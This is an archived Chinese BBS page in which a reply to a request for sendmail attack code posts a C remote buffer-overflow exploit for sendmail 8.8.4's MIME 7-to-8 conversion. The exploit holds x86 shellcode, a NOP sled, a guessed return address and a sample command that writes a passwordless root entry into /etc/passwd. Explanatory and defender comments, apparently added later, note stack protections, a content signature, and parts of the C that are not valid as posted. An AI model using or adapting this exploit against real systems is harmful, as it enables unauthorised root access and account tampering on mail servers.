<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=gb2312">
<title>CTerm非常精华下载</title>
</head>
<body bgcolor="#FFFFFF">
<table border="0" width="100%" cellspacing="0" cellpadding="0" height="577">
<tr><td width="32%" rowspan="3" height="123"><img src="DDl_back.jpg" width="300" height="129" alt="DDl_back.jpg"></td><td width="30%" background="DDl_back2.jpg" height="35"><p align="center"><a href="http://apue.dhs.org"><font face="黑体"><big><big>apue</big></big></font></a></td></tr>
<tr>
<td width="68%" background="DDl_back2.jpg" height="44"><big><big><font face="黑体"><p align="center">               ● UNIX网络编程                       (BM: clown)                </font></big></big></td></tr>
<tr>
<td width="68%" height="44" bgcolor="#000000"><font face="黑体"><big><big><p   align="center"></big></big><a href="http://cterm.163.net"><img src="banner.gif" width="400" height="60" alt="banner.gif"border="0"></a></font></td>
</tr>
<tr><td width="100%" colspan="2" height="100" align="center" valign="top"><br><p align="center">[<a href="index.htm">回到开始</a>][<a href="377.htm">上一层</a>][<a href="387.htm">下一篇</a>]
<hr><p align="left"><small>发信人: VRGL (毕业设计做三维渲染----真苦!!!), 信区: Security <br>

标  题: Re: 请问哪儿可以下栽对sendmail进行攻击的源程序 <br>

发信站: BBS 水木清华站 (Sat Aug  5 09:01:47 2000) <br>

  <br>

/* <br>

  sendmail 8.8.4, freebsd, mime 7to8, remote <br>

  I checked this only at home, at custom installed 8.8.4. <br>

  I have no freebsd with preinstaled 8.8.4 around. <br>

  change cmd[] below to shell command you want, and throw output to sendmail <br>

  <br>

 */ <br>

#include <stdlib.h> <br>

#include <fcntl.h> <br>

#define BUFSIZE 6100 <br>

#define OFFS -5000 <br>

#define ALIGN 0 <br>

#define ADDRS 15 <br>

/* <br>

  Returns a hard-coded 32-bit constant in place of the live stack pointer; <br>

  the inline asm that would have read %esp is commented out. main() adds its <br>

  offset to this value and repeats the result at the tail of the buffer. <br>

  Defender's note: the approach relies on the target's stack sitting at a <br>

  predictable address (the header comment says it was only tried on one <br>

  custom install). Address-space randomisation and a non-executable stack <br>

  both undercut that assumption. <br>

 */ <br>

int get_sp(void) { <br>

/* __asm__(" movl       %esp,%eax"); */ <br>

  /* NOTE(review): 0xefbf95e4 does not fit in a signed 32-bit int, so the conversion to the int return type is implementation-defined. */ <br>

  return 0xefbf95e4; <br>

} <br>

/* <br>

  cmd: shell command text that main() appends to the machine-code string. <br>

  The author's limit is "up to 220 bytes". The sample value contains a <br>

  passwd-format entry for a UID 0 account with an empty password field and <br>

  names /etc/passwd; for responders, an unexpected UID 0 line in that file <br>

  is worth checking on any host that ran the sendmail version named in the <br>

  header comment. <br>

 */ <br>

/* up to 220 bytes */ <br>

char cmd[]="echo 'h::0:0:/tmp:/bin/bash > /etc/passwd'"; <br>



/* <br>

  asmcode: opaque machine-code bytes, not disassembled in this note. The <br>

  last eleven bytes are the ASCII text "/bin/sh.-c.", and main() overwrites <br>

  the byte at index 41 after copying. <br>

 */ <br>

char asmcode[]="\xeb\x37\x5e\x31\xc0\x88\x46\xfa\x89\x46\xf5\x89" <br>

          "\x36\x89\x76\x04\x89\x76\x08\x83\x06\x10\x83\x46" <br>

          "\x04\x18\x83\x46\x08\x1b\x89\x46\x0c\x88\x46\x17" <br>

          "\x88\x46\x1a\x88\x46\x1d\x50\x56\xff\x36\xb0\x3b" <br>

          "\x50\x90\x9a\x01\x01\x01\x01\x07\x07\xe8\xc4\xff" <br>

          "\xff\xff\x02\x02\x02\x02\x02\x02\x02\x02\x02\x02" <br>

          "\x02\x02\x02\x02\x02\x02\x2f\x62\x69\x6e\x2f\x73" <br>

          "\x68\x2e\x2d\x63\x2e"; <br>

/* <br>

  nop: the single filler byte 0x90 (the x86 no-op opcode) that main() <br>

  repeats bufsize times. Detection note: three 0x90 bytes base64-encode to <br>

  the four characters "kJCQ", so the filler appears in the message body as <br>

  that group repeated many times, which makes a simple content signature. <br>

 */ <br>

char nop[]="\x90"; <br>

/* Base64Table: the standard base64 alphabet, indexed by 6-bit value in run(). The literal is split over two lines here, presumably by the BBS line wrap. */ <br>

char Base64Table[]="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123 <br>

456789+/"; <br>

/* <br>

  Prints buf to stdout as a MIME message: three header lines, then the <br>

  base64 encoding of buf. Nothing is sent anywhere by this function; the <br>

  header comment says the output is meant to be fed to sendmail. <br>

  buf is measured with strlen(), so encoding stops at the first zero byte. <br>

  Defender's note: the pairing of "Content-Type: text/plain" with <br>

  "Content-Transfer-Encoding: base64" is presumably what routes the body <br>

  through the "mime 7to8" conversion named in the header comment. <br>

 */ <br>

void run(unsigned char *buf) { <br>

  unsigned int i, j, k; <br>

  printf("MIME-Version: 1.0\n"); <br>

  printf("Content-Type: text/plain\n"); <br>

  printf("Content-Transfer-Encoding: base64\n"); <br>

  /* k = length rounded down to a whole number of 3-byte groups. */ <br>

  k=strlen(buf) / 3 * 3; <br>

  for (i=0; i < k; i+=3) { <br>

    /* Pack three input bytes into one 24-bit value. */ <br>

    j=(buf[i] << 16) + (buf[i+1] << 8) + buf[i+2]; <br>

    /* Newline every 54 input bytes (72 output characters); the one at i == 0 is the blank line that ends the headers. */ <br>

    if (i % 54 == 0) <br>

      printf("\n"); <br>

    /* Emit the four 6-bit fields, most significant first. */ <br>

    printf("%c", Base64Table[(j & 0xfc0000) >> 18]); <br>



    printf("%c", Base64Table[(j & 0x03f000) >> 12]); <br>

    printf("%c", Base64Table[(j & 0x000fc0) >> 6]); <br>

    printf("%c", Base64Table[j & 0x00003f]); <br>

  } <br>

  /* Encode the 1 or 2 leftover bytes with '=' padding; a remainder of 0 needs none. */ <br>

  switch (strlen(buf) - k) { <br>

    case 1: printf("%c%c==", Base64Table[(buf[k] & 0xfc) >> 2], <br>

                   Base64Table[(buf[k] & 0x3) << 4]); <br>

        break; <br>

    case 2: printf("%c%c%c=", Base64Table[(buf[k] & 0xfc) >> 2], <br>

                   Base64Table[((buf[k] & 0x3) << 4)+((buf[k+1] & 0xf0) >> 4 <br>

)], <br>

                   Base64Table[(buf[k+1] & 0xf) << 2]); <br>

        break; <br>

    default: <br>

  } <br>

  printf("\n"); <br>

} <br>

/* code: scratch buffer sized to hold asmcode and cmd together. */ <br>

char code[sizeof(asmcode) + sizeof(cmd)]; <br>

/* <br>

  Builds the message body in memory and passes it to run(), which prints <br>

  it. Layout of buf as assembled below: bufsize filler bytes (with the <br>

  combined code string copied over the last strlen(code) of them), then <br>

  addrs<<2 bytes repeating one computed address, then a terminating zero. <br>

  Output goes to stdout only; nothing here opens a network connection. <br>

  NOTE(review): parts of this function are not valid or not well-defined C <br>

  as posted, so these comments describe evident intent rather than <br>

  guaranteed behaviour. <br>

  Defensive takeaways: the header comment ties this to sendmail 8.8.4's <br>

  MIME 7-to-8-bit handling, so moving off that release removes the <br>

  exposure. The layout above (a long single-byte filler followed by one <br>

  4-byte value repeated) is what content inspection can look for once the <br>

  base64 body is decoded. Stack protections such as a non-executable stack <br>

  and address randomisation target exactly this pattern. <br>

 */ <br>

main(int argc, char *argv[]) { <br>

  char *buf, *ptr, addr[8]; <br>

  int offs=OFFS, bufsize=BUFSIZE, addrs=ADDRS; <br>

  int i, noplen=strlen(nop); <br>



  /* Optional overrides from the command line; atoi() reports no errors, so non-numeric input becomes 0. */ <br>

  if (argc >1) bufsize=atoi(argv[1]); <br>

  if (argc >2) offs=atoi(argv[2]); <br>

  if (argc >3) addrs=atoi(argv[3]); <br>

  /* code = asmcode followed by cmd and a trailing "." (evident intent). */ <br>

  strcpy(code, asmcode); <br>

  strncat(code, cmd); <br>

  strncat(code, "."); <br>

  /* Overwrite one byte of the copied code with a value derived from strlen(cmd). */ <br>

  code[41]=0x1a+strlen(cmd)+1; <br>

  /* The filler region must be at least as long as the combined code string. */ <br>

  if (bufsize<strlen(code)) { <br>

    printf("bufsize too small, code is %d bytes long\n", strlen(asmcode)); <br>

    exit(1); <br>

  } <br>

  /* Heap buffer meant to hold the filler, the address block and the terminator. */ <br>

  if ((buf=malloc(bufsize+ADDRS<<2+noplen+1))==NULL) { <br>

    printf("Can't malloc\n"); <br>

    exit(1); <br>

  } <br>

  /* addr receives the raw bytes of get_sp()+offs; only the first sizeof(int) bytes are read back below. */ <br>

  *(int *)addr=get_sp()+offs; <br>

  printf("address - %p\n", *(int *)addr); <br>

  ptr=buf; <br>

  /* Fill the first bufsize bytes with the filler byte. */ <br>

  for (i=0; i<bufsize; i++) <br>

    *ptr++=nop[i % noplen]; <br>

  /* Copy the code string over the end of the filler region. */ <br>

  memcpy(ptr-strlen(code), code, strlen(code)); <br>

  /* Append the address bytes, repeated until addrs<<2 bytes have been written. */ <br>

  for (i=0; i<addrs<<2; i++) <br>



    *ptr++=addr[i % sizeof(int)]; <br>

  /* Terminate the buffer; run() measures it with strlen(). */ <br>

  *ptr=0; <br>

  printf("total buf len - %d\n", strlen(buf)); <br>

  run(buf); <br>

} <br>

/*                       www.hack.co.za                    */ <br>

  <br>

【 在 volkswagon (痛哭的人) 的大作中提到: 】 <br>

: 如题 <br>

  <br>

  <br>

-- <br>

</small><hr>
<p align="center">[<a href="index.htm">回到开始</a>][<a href="377.htm">上一层</a>][<a href="387.htm">下一篇</a>]
<p align="center"><a href="http://cterm.163.net">欢迎访问Cterm主页</a></p>
</table>
</body>
</html>
